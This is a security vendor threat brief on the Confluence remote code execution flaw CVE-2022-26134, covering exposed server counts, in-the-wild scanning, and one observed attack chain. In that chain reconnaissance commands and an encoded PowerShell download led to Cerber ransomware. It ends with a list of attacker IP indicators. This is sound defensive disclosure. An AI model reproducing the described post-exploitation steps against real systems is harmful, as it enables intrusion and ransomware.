Protect Against Russia-Ukraine Cyber Activity

Threat Brief: Atlassian Confluence Remote Code Execution Vulnerability (CVE-2022-26134) (Updated)

Threat Brief image, representing brief analyses of vulnerabilities such as CVE-2022-26134

This post is also available in: 日本語 (Japanese)

Executive Summary

On June 2, Volexity reported that over Memorial Day weekend, they identified suspicious activity on two internet-facing servers running Atlassian’s Confluence Server application. After analysis of the compromise, Volexity determined the initial foothold was the result of a remote code execution vulnerability in Confluence Server and Data Center. The details were reported to Atlassian on May 31, and Atlassian has since assigned the issue to CVE-2022-26134.

Based on the security advisory issued by Atlassian, it appears that the exploit is indeed an unauthenticated, remote code execution vulnerability. If the vulnerability is exploited, threat actors could bypass authentication and run arbitrary code on unpatched systems. At the time of publication, the Palo Alto Networks attack surface management solution Cortex Xpanse identified 19,707 instances of Confluence Servers that are potentially affected by this CVE.

A patch resolving the issue has been posted by Atlassian. Palo Alto Networks strongly advises organizations to patch immediately.

Updated June 7 to add additional in-the-wild observations.

Vulnerabilities Discussed CVE-2022-26134

Table of Contents

Vulnerable Systems
CVE-2022-26134 in the Wild
Cortex Managed Threat Hunting Detections of CVE-2022-26134
Conclusion
Indicators of Compromise

Vulnerable Systems

The Palo Alto Networks attack surface management solution Cortex Xpanse found 19,707 instances of Confluence Servers that are potentially affected by this CVE. The majority of these instances were discovered to reside within the United States, Germany, China and Russia.

Geo stats on Confluence Servers potentially vulnerable to CVE-2022-26134: USA 34.6%, Germany 18.3%, China 9.6%, Russia 5.2%, Ireland (small share), Rest of World 29.2%
Figure 1. On June 3, 2022, Cortex Xpanse found potentially vulnerable Confluence Servers distributed as shown throughout the globe. (The 29.2% shown in gray indicates potentially vulnerable servers in the rest of the world.)

Additionally, the Xpanse research team also found 1,251 end-of-life versions of the Confluence Server exposed on the public internet. Assets running end-of-life software should never be internet-facing. If an asset cannot be updated to secure versions of software, it should be isolated or decommissioned altogether. To learn more about the ubiquitous problem of end-of-life software, please refer to the 2022 Cortex Xpanse Attack Surface Threat Report.

CVE-2022-26134 in the Wild

Thus far, Unit 42 has noted historical scans being performed by the IP addresses publicly shared by Volexity. These scans date back as early as May 26, 2022, and target organizations in various industries.

Additionally, a purported proof of concept (PoC) has reached the public domain, increasing the threat this particular vulnerability poses.

Cortex Managed Threat Hunting Detections of CVE-2022-26134

The Cortex Managed Threat Hunting team has detected several exploitation attempts. Among the attempts, we found successful exploitation, which resulted in the Cerber Ransomware attack. 

The ransomware was blocked by the Cortex XDR agent. The Managed Threat Hunting team immediately reported this incident to the customer and continues to monitor our customers using the XQL queries in the following section. Cortex XDR also includes multiple detections for post-exploitation activities.

Below are details of what was seen in the attempt. 

A flowchart showing what was observed in successful CVE-2022-26134 exploitation activity.
Figure 2. Successful CVE-2022-26134 exploitation activity.

In this case, the process tomcat.exe spawned multiple reconnaissance commands such as: whoami, systeminfo, arp, ipconfig, etc.

On top of that, a Base64-encoded PowerShell command was executed and retrieved a ransomware binary.

Decoded Base64 PowerShell command. The command shown begins with IEX.
Figure 3. Decoded Base64 PowerShell command.

In order to confirm the assumption that the above activity is related to CVE-2022-26134, we looked into the Confluence Apache access logs (atlassian-confluence.log) and found the PowerShell execution.

atlassian-confluence.log file. The atlassian-confluence.log file shows the PowerShell execution (highlighted in green in the image)
Figure 4. atlassian-confluence.log file.

Hunting Queries

The Cortex Managed Threat Hunting team continues to track any attempts to exploit CVE-2022-26134 across our customers, using Cortex XDR and the XQL queries below.

Conclusion

Palo Alto Networks provides protection against the exploitation of this vulnerability in the following ways:

  • Next-Generation Firewalls (PA-Series, VM-Series and CN-Series) or Prisma Access with a Threat Prevention security subscription can automatically block sessions related to this vulnerability using Threat ID 92632 (Application and Threat content update 8577).
  • Cortex XDR for Linux helps block CVE-2022-26134 attacks out of the box. Cortex XDR helps protect against post-exploitation activities on all OSes.
  • Prisma Cloud Web Application and API Security (WAAS) customers can use the OGNL Evaluation Injection custom rule in order to detect and block exploitation attempts.

Additionally, Xpanse has the ability to identify and detect Atlassian Confluence Servers that may be a part of your attack surface or the attack surface of third-party partners connected to your organization. Xpanse is even able to classify those servers which have not been upgraded to the most recent version. These abilities will be updated to detect additional instances or versions that are insecure against this CVE.

Existing Xpanse customers can log into Expander and identify their enumerated Atlassian Confluence devices by filtering by “Atlassian Confluence Server” in the Services tab.

As further information emerges or additional detections and protections are put into place, Palo Alto Networks will update this publication accordingly.

Indicators of Compromise 

During the hunting process, we encountered exploitation attempts that originated from the following IP addresses:

IoC Type IoC
Ipv4 172.104.31.117
Ipv4 191.37.248.120
Ipv4 84.17.48.94
Ipv4 193.106.191.71
Ipv4 54.88.149.100
Ipv4 18.216.140.250
Ipv4 18.221.234.103
Ipv4 89.187.170.129
Ipv4 2.56.11.65
Ipv4 87.249.135.167
Ipv4 192.99.152.200
Ipv4 31.13.191.157
Ipv4 27.1.1.34
Ipv4 167.99.57.116

Updated June 13, 2022, at 5:30 a.m. PT.